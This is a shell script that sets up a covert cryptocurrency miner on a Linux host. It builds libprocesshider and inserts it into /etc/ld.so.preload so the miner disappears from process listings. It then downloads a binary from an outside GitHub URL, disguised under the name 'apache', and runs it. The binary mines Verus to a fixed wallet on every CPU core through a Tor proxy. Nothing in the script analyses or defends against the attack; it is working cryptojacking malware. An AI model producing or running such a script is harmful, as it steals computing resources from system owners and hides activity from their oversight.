#!/bin/sh
sudo apt update
sudo apt install libcurl4-openssl-dev libssl-dev libjansson-dev automake autotools-dev build-essential nano tor proxychains git -y
sudo service tor start

git clone https://github.com/hanifgz/libprocesshider.git
cd libprocesshider
sed -i 's/apache/verus-solver/' processhider.c
make
sudo mv libprocesshider.so /usr/local/lib/;sudo su -c 'echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload'
cd ..
sudo rm libprocesshider -r

wget https://raw.githubusercontent.com/kuyaxxx/nambang/main/apache
chmod +x apache

sleep 5
./apache -a verus -o stratum+tcp://eu.luckpool.net:3956 -u RKJZtNARyonv8N2GtPAo5E7sn8uHPjt2LZ.$(echo $(shuf -i 1-1000 -n 1)) -p x -t $(echo $(nproc --all)) --proxy socks5://127.0.0.1:9050
